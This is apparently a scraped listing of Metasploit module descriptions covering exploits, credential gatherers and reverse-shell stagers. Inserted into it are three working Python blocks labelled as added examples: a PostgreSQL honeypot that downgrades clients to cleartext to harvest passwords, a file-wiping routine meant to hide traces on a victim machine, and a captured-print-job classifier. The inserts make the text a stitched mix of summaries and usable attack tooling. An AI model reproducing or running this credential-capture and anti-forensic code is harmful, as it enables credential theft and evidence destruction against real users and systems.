6843 matches found
Lantronix Telnet Password Recovery
This module retrieves the setup record from Lantronix serial-to-ethernet devices via the config port (30718/udp, enabled by default) and extracts the telnet password. It has been tested successfully on a Lantronix Device Server with software version V5.8.0.1. This module requires Metasploit:...
AjaXplorer checkInstall.php Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework...
Project Pier Arbitrary File Upload Vulnerability
This module exploits a vulnerability found in Project Pier. The application's uploading tool does not require any authentication, which allows a malicious user to upload an arbitrary file onto the web server, and then cause remote code execution by simply requesting it. This module is known to wo...
KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
This module exploits a code execution vulnerability in the KeyScript ActiveX control from keyhelp.ocx. It is packaged in several products of GE, such as Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver...
Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution
This module exploits an authentication bypass vulnerability on Avaya IP Office Customer Call Reporter, which allows a remote user to upload arbitrary files through the ImageUpload.ashx component. It can be abused to upload and execute arbitrary ASP .NET code. The vulnerability has been tested...
PhpTax pfilez Parameter Exec Remote Code Injection
This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng function in drawimage.php does not properly handle the pfilez parameter, which will be used in an exec statement, and then results in arbitrary remote code execution under...
Avaya WinPMD UniteHostRouter Buffer Overflow
This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability exists in the UniteHostRouter service, due to the insecure usage of memcpy when parsing specially crafted "To:" headers. The module has been tested successfully on Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 20...
Windows Escalate UAC Execute RunAs
This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
InduSoft Web Studio Arbitrary Upload Remote Code Execution
This module exploits a lack of authentication and authorization on the InduSoft Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to the filesystem, by abusing the functions provided by the software. The module uses the Windows Management Instrumentation service to...
Multi Gather GnuPG Credentials Collection
This module will collect the contents of all users' .gnupg directories on the targeted machine. Password protected secret keyrings can be cracked with John the Ripper (JtR). This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
Authentication Capture: PostgreSQL
This module provides a fake PostgreSQL service that is designed to capture clear-text authentication credentials. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
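The exchange such a capture service relies on, as an added example (this is not the Metasploit module's code). Message framing follows the public PostgreSQL v3 wire protocol; the honeypot flow itself (refuse the client's SSLRequest with "N", answer the StartupMessage with AuthenticationCleartextPassword, read the PasswordMessage, then fail the login with an ordinary 28P01 error) is the assumed design, and the client messages in the test are constructed, not captured:

```python
"""PostgreSQL v3 wire handling for a cleartext-credential honeypot.
Added example; message layouts are from the public protocol spec, the
honeypot behaviour (refuse TLS, demand cleartext, fail the login) is assumed."""
import struct

SSL_REQUEST_CODE = 80877103   # special "version" value meaning SSLRequest
PROTOCOL_V3 = 196608          # major 3, minor 0
AUTH_CLEARTEXT_PASSWORD = 3   # AuthenticationCleartextPassword sub-type


# --- client-side builders, used here only to construct sample traffic ---
def build_ssl_request():
    return struct.pack("!II", 8, SSL_REQUEST_CODE)


def build_startup(params):
    """StartupMessage: int32 len, int32 version, NUL-separated k/v pairs, NUL."""
    body = b"".join(k.encode() + b"\x00" + v.encode() + b"\x00"
                    for k, v in params.items()) + b"\x00"
    return struct.pack("!II", 8 + len(body), PROTOCOL_V3) + body


def build_password(password):
    """PasswordMessage: 'p', int32 len (self-inclusive), password, NUL."""
    payload = password.encode() + b"\x00"
    return b"p" + struct.pack("!I", 4 + len(payload)) + payload


# --- honeypot (server) side ---
def parse_startup(data):
    if len(data) < 8:
        raise ValueError("short startup packet")
    length, code = struct.unpack("!II", data[:8])
    if length != len(data):
        raise ValueError("startup length field does not match packet")
    if code == SSL_REQUEST_CODE:
        return {"ssl_request": True}
    if code >> 16 != 3:
        raise ValueError("unsupported protocol major version %d" % (code >> 16))
    body = data[8:]
    if not body.endswith(b"\x00\x00"):
        raise ValueError("unterminated parameter list")
    fields = body[:-2].split(b"\x00")
    return {k.decode(): v.decode() for k, v in zip(fields[::2], fields[1::2])}


def auth_cleartext_request():
    """AuthenticationCleartextPassword: 'R', int32 8, int32 3."""
    return b"R" + struct.pack("!II", 8, AUTH_CLEARTEXT_PASSWORD)


def parse_password(data):
    if data[:1] != b"p":
        raise ValueError("expected PasswordMessage")
    (length,) = struct.unpack("!I", data[1:5])
    if len(data) != 1 + length or data[-1:] != b"\x00":
        raise ValueError("malformed PasswordMessage")
    return data[5:-1].decode()


def error_response(code, message):
    """ErrorResponse: 'E', int32 len, 'S'/'C'/'M' fields, terminating NUL."""
    fields = b"SFATAL\x00C" + code.encode() + b"\x00M" + message.encode() + b"\x00\x00"
    return b"E" + struct.pack("!I", 4 + len(fields)) + fields


def capture_session(client_msgs):
    """Drive the server side over a list of client messages.
    Returns (captured credentials, list of bytes the server would send)."""
    creds, responses = {}, []
    for msg in client_msgs:
        if "user" not in creds:                 # still in the startup phase
            info = parse_startup(msg)
            if info.get("ssl_request"):
                responses.append(b"N")          # refuse TLS so the password stays in clear
                continue
            creds = {"user": info.get("user"),
                     "database": info.get("database", info.get("user"))}
            responses.append(auth_cleartext_request())
        else:
            creds["password"] = parse_password(msg)
            # Fail the login so the client only sees a normal auth error.
            responses.append(error_response(
                "28P01", 'password authentication failed for user "%s"' % creds["user"]))
            break
    return creds, responses
```

The "N" reply to SSLRequest is the step that matters operationally: libpq defaults to sslmode=prefer, so a client that is refused TLS silently falls back to plaintext and sends its password in the clear; a client pinned to sslmode=require will disconnect instead, and nothing is captured.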
Windows Manage Safe Delete
The goal of the module is to hinder the recovery of deleted files by overwriting their contents. This could be useful when you need to download some file to the victim machine and then delete it without leaving clues about its contents. Note that the script does not wipe the free disk space so...
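The overwrite-then-unlink technique described above, as an added example that is not the Metasploit post module's code. The pass count, the rename before unlink (so the original file name is gone from the directory entry as well) and the use of random data are assumptions about how such a tool would behave; the demo file is constructed:

```python
"""Overwrite a file in place before deleting it. Added example; the pass
count and the rename step are assumed, not taken from the module."""
import os
import tempfile


def safe_delete(path, passes=2, chunk=64 * 1024):
    """Overwrite the file's current contents, sync to disk, shrink it to zero,
    rename it to a bland name and unlink it. Returns bytes overwritten per pass."""
    size = os.path.getsize(path)
    with open(path, "r+b", buffering=0) as f:
        for _ in range(passes):
            f.seek(0)
            remaining = size
            while remaining:
                n = min(chunk, remaining)
                f.write(os.urandom(n))      # random bytes, not zeros: no obvious "wiped" pattern
                remaining -= n
            os.fsync(f.fileno())            # push the overwrite past the page cache
        f.truncate(0)                       # no original size left in the inode / MFT record
        os.fsync(f.fileno())
    # The directory entry still carries the original name; rename before unlink.
    directory = os.path.dirname(path) or "."
    anon = os.path.join(directory, "%08x" % int.from_bytes(os.urandom(4), "big"))
    while os.path.exists(anon):
        anon = os.path.join(directory, "%08x" % int.from_bytes(os.urandom(4), "big"))
    os.replace(path, anon)
    os.remove(anon)
    return size


def demo():
    """Create a throwaway file with known content, wipe it, and report
    (bytes overwritten, whether the path still exists)."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(b"secret loot\n" * 1000)   # constructed sample content
    wiped = safe_delete(path)
    return wiped, os.path.exists(path)
```

The caveat in the description applies to this code too: only the blocks currently mapped to the file are overwritten. Previously freed blocks, file-system journal copies, volume shadow copies, and the remapped flash pages of an SSD under wear levelling are untouched, so on such targets the overwrite raises the cost of recovery rather than ruling it out.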
QNX qconn Command Execution
This module uses the qconn daemon on QNX systems to gain a shell. The QNX qconn daemon does not require authentication and allows remote users to execute arbitrary operating system commands. This module has been tested successfully on QNX Neutrino 6.5.0 x86 and 6.5.0 SP1 x86...
Windows Gather Apache Tomcat Enumeration
This module will collect information from a Windows-based Apache Tomcat. You will get information such as: The installation path, Tomcat version, port, web applications, users, passwords, roles, etc. This module requires Metasploit: https://metasploit.com/download Current source:...
Samba SetInformationPolicy AuditEventsInfo Heap Overflow
This module triggers a vulnerability in the LSA RPC service of the Samba daemon caused by an error in the PIDL auto-generated code. Making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation triggers a heap overflow and finally executes arbitrary code...
Indusoft WebStudio NTWebServer Remote File Access
This module exploits a directory traversal vulnerability in Indusoft WebStudio. The vulnerability exists in the NTWebServer component and allows reading arbitrary remote files with the privileges of the NTWebServer process. The module has been tested successfully on Indusoft WebStudio 6.1 SP6. Th...
Dell iDRAC Default Login
This module attempts to log in to an iDRAC web server instance using the default username and password. Tested against Dell Remote Access Controller 6 - Express versions 1.50 and 1.85, Controller 7 - Enterprise 2.63.60.62, Controller 8 - Enterprise 2.83.05, and Controller 9 - Enterprise 4.40.00.00. This module...
MS11-080 AfdJoinLeaf Privilege Escalation
This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then...
phpMyAdmin 3.5.2.2 server_sync.php Backdoor
This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
Auxilium RateMyPet Arbitrary File Upload Vulnerability
This module exploits a vulnerability found in Auxilium RateMyPet. The site banner uploading feature can be abused to upload an arbitrary file to the web server, which is accessible in the 'banner' directory, thus allowing remote code execution. This module requires Metasploit:...
HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution
This module exploits a vulnerability within the XGO.ocx ActiveX Control installed with the HP Application Lifecycle Manager Client. The vulnerability exists in the SetShapeNodeType method, which allows the user to specify memory that will be used as an object, through the node parameter. It allow...
HTTP Client Automatic Exploiter
This module has three actions. The first and the default is 'WebServer' which uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them. Next is 'DefangedDetection' which does only the fingerprinting part. Lastly, 'list' simply...
OS X x64 say Shellcode
Say an arbitrary string out loud using Mac OS X text2speech. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
OSX Meterpreter, Reverse TCP Stager
Inject the mettle server payload (staged). Connect, read length, read buffer, execute. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
OS X dup2 Command Shell, Reverse TCP Stager
dup2 socket in edi, then execve. Connect, read length, read buffer, execute. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
OSX Meterpreter, Bind TCP Stager
Inject the mettle server payload (staged). Listen, read length, read buffer, execute. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
OS X dup2 Command Shell, Bind TCP Stager
dup2 socket in edi, then execve. Listen, read length, read buffer, execute. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
OSX Command Shell, Find Tag Inline
Spawn a shell on an established connection (proxy/NAT safe). This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
Windows Gather Database Instance Enumeration
This module will enumerate a Windows system for installed database instances. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
ZEN Load Balancer Filelog Command Execution
This module exploits a vulnerability in ZEN Load Balancer version 2.0 and 3.0-rc1 which could be abused to allow authenticated users to execute arbitrary code under the context of the 'root' user. The 'content2-2.cgi' file uses user controlled data from the 'filelog' parameter within backticks...
NTR ActiveX Control Check() Method Buffer Overflow
This module exploits a vulnerability found in NTR ActiveX 1.1.8. The vulnerability exists in the Check method, due to the insecure usage of strcat to build a URL using the bstrParams parameter contents (note: this is also the reason why the module won't allow you to modify the URIPATH), which leads...
NTR ActiveX Control StopModule() Remote Code Execution
This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The vulnerability exists in the StopModule method, where the lModule parameter is used to dereference memory to get a function pointer, which leads to code execution under the context of the user visiting a malicious web page...
Printjob Capture Service
This module is designed to listen for PJL or PostScript print jobs. Once a print job is detected it is saved to loot. The captured print job can then be forwarded on to another printer (required for LPR print jobs). Resulting PCL/PS files can be read with GhostScript/GhostPCL. Note, this module does...
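What such a listener has to do with each job it receives, as an added example (not the Metasploit module's code): tell a PJL-wrapped job from bare PostScript or PCL, pull the job title out of the PJL header or the PostScript DSC comment, strip the PJL envelope so the page data can be handed to GhostScript/GhostPCL, and derive a loot file name that a hostile `@PJL JOB NAME` cannot turn into a path traversal. The sample jobs are constructed, and the port constant is an assumption:

```python
"""Classify a captured raw print job and name its loot file. Added example;
sample jobs are constructed and the listener port is assumed (9100, the
usual raw/JetDirect port)."""
import re

UEL = b"\x1b%-12345X"       # PJL Universal Exit Language sequence
RAW_PRINT_PORT = 9100       # assumed listener port

# Constructed sample jobs
SAMPLE_PJL_PS = (
    UEL
    + b'@PJL JOB NAME = "payroll_q3.pdf"\r\n'
    + b"@PJL SET COPIES=1\r\n"
    + b"@PJL ENTER LANGUAGE = POSTSCRIPT\r\n"
    + b"%!PS-Adobe-3.0\n/Helvetica findfont 12 scalefont setfont\n"
    + b"72 720 moveto (hello) show\nshowpage\n"
    + UEL + b"@PJL EOJ\r\n" + UEL
)
SAMPLE_PS = b"%!PS-Adobe-3.0\n%%Title: memo.txt\n%%Pages: 1\nshowpage\n"
SAMPLE_PCL = b"\x1bE\x1b&l1X\x1b(s0p10h12vsb3Tplain pcl text\x1bE"


def classify_job(data):
    """Identify the wrapper / page language and extract a job title."""
    info = {"format": "unknown", "language": None, "job_name": None, "ext": "bin"}
    if data.startswith(UEL) or data.lstrip().startswith(b"@PJL"):
        info["format"] = "pjl"
        m = re.search(rb'@PJL\s+JOB\s+NAME\s*=\s*"([^"]*)"', data)
        if m:
            info["job_name"] = m.group(1).decode("latin-1")
        m = re.search(rb"@PJL\s+ENTER\s+LANGUAGE\s*=\s*([A-Za-z0-9]+)", data)
        if m:
            info["language"] = m.group(1).decode().upper()
        info["ext"] = {"POSTSCRIPT": "ps", "PCL": "pcl", "PCLXL": "pxl"}.get(info["language"], "pjl")
    elif data.startswith(b"%!PS"):
        info["format"] = "postscript"
        info["language"] = "POSTSCRIPT"
        info["ext"] = "ps"
        m = re.search(rb"^%%Title:\s*(.+?)\s*$", data, re.M)   # DSC comment
        if m:
            info["job_name"] = m.group(1).decode("latin-1")
    elif data.startswith(b"\x1bE"):                             # PCL printer reset
        info["format"] = "pcl"
        info["language"] = "PCL"
        info["ext"] = "pcl"
    return info


def strip_pjl_wrapper(data):
    """Return the embedded page data without the PJL envelope: everything
    after the ENTER LANGUAGE line up to the next UEL."""
    m = re.search(rb"@PJL\s+ENTER\s+LANGUAGE[^\r\n]*\r?\n", data)
    if not m:
        return data
    end = data.find(UEL, m.end())
    return data[m.end():end if end != -1 else len(data)]


def loot_filename(src_ip, info):
    """Loot name from source address and job title; characters outside a
    safe set are replaced and leading dots dropped, so a crafted JOB NAME
    such as ../../etc/passwd cannot escape the loot directory."""
    title = info["job_name"] or "untitled"
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", title)[:64].strip("._") or "untitled"
    return "%s_%s.%s" % (src_ip.replace(":", "_"), safe, info["ext"])
```

The job title is attacker-controlled input from the network, which is why `loot_filename` sanitises it rather than using it verbatim; the same care applies to any other PJL variable a listener chooses to log.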
OS X x64 Shell Bind TCP
Bind an arbitrary command to an arbitrary port. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
OS X x64 Shell Reverse TCP
Connect back to attacker and spawn a command shell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
This module exploits a vulnerability found in Microsoft Internet Explorer MSIE. When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec function, leading to a use-after-free condition. Please note tha...
Webmin /file/show.cgi Remote Command Execution
This module exploits an arbitrary command execution vulnerability in Webmin 1.580. The vulnerability exists in the /file/show.cgi component and allows an authenticated user, with access to the File Manager Module, to execute arbitrary commands with root privileges. The module has been tested...
Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
This module exploits a directory traversal in Webmin 1.580. The vulnerability exists in the edit_html.cgi component and allows an authenticated user with access to the File Manager Module to access arbitrary files with root privileges. The module has been tested successfully with Webmin 1.580 over...
Oracle Business Transaction Management FlashTunnelService Remote Code Execution
This module abuses the FlashTunnelService SOAP web service on Oracle Business Transaction Management 12.1.0.7 to upload arbitrary files, without authentication, using the WriteToFile method. The same method contains a directory traversal vulnerability, which allows uploading the files to...
Linux Command Shell, Bind TCP Stager
Spawn a command shell (staged). Listen for a connection. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
Linux Mettle x86, Bind TCP Stager
Inject the mettle server payload (staged). Listen for a connection. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
Linux Mettle x86, Reverse TCP Stager
Inject the mettle server payload (staged). Connect back to the attacker. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
Linux Command Shell, Reverse TCP Stager
Spawn a command shell (staged). Connect back to the attacker. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
Novell File Reporter Agent Arbitrary File Delete
NFRAgent.exe in Novell File Reporter allows remote attackers to delete arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File...
qdPM v7 Arbitrary PHP File Upload Vulnerability
This module exploits a vulnerability found in qdPM - a web-based project management software. The user profile's photo upload feature can be abused to upload any arbitrary file onto the victim server machine, which allows remote code execution. Please note in order to use this module, you must ha...
Free Float FTP Server USER Command Buffer Overflow
Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted 'USER' command, a remote attacker can potentially have an unspecified impact. This module requires Metasploit:...
Apple iOS MobileMail LibTIFF Buffer Overflow
This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. This module requires Metasploit: https://metasploit.com/download...
Apple iOS MobileSafari LibTIFF Buffer Overflow
This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. This module requires Metasploit: https://metasploit.com/download...
Linux udev Netlink Local Privilege Escalation
Versions of udev... Authors: kcope (discovery), Jon Oberheide (95-udev-late.rules technique), egypt (Metasploit module). Platform: linux. Arch: x86, x64. Session types: shell, ...
Winamp MAKI Buffer Overflow
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the genff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used in an insecure way with user controlled data. To exploit the vulnerability the attacker must convince the victim to...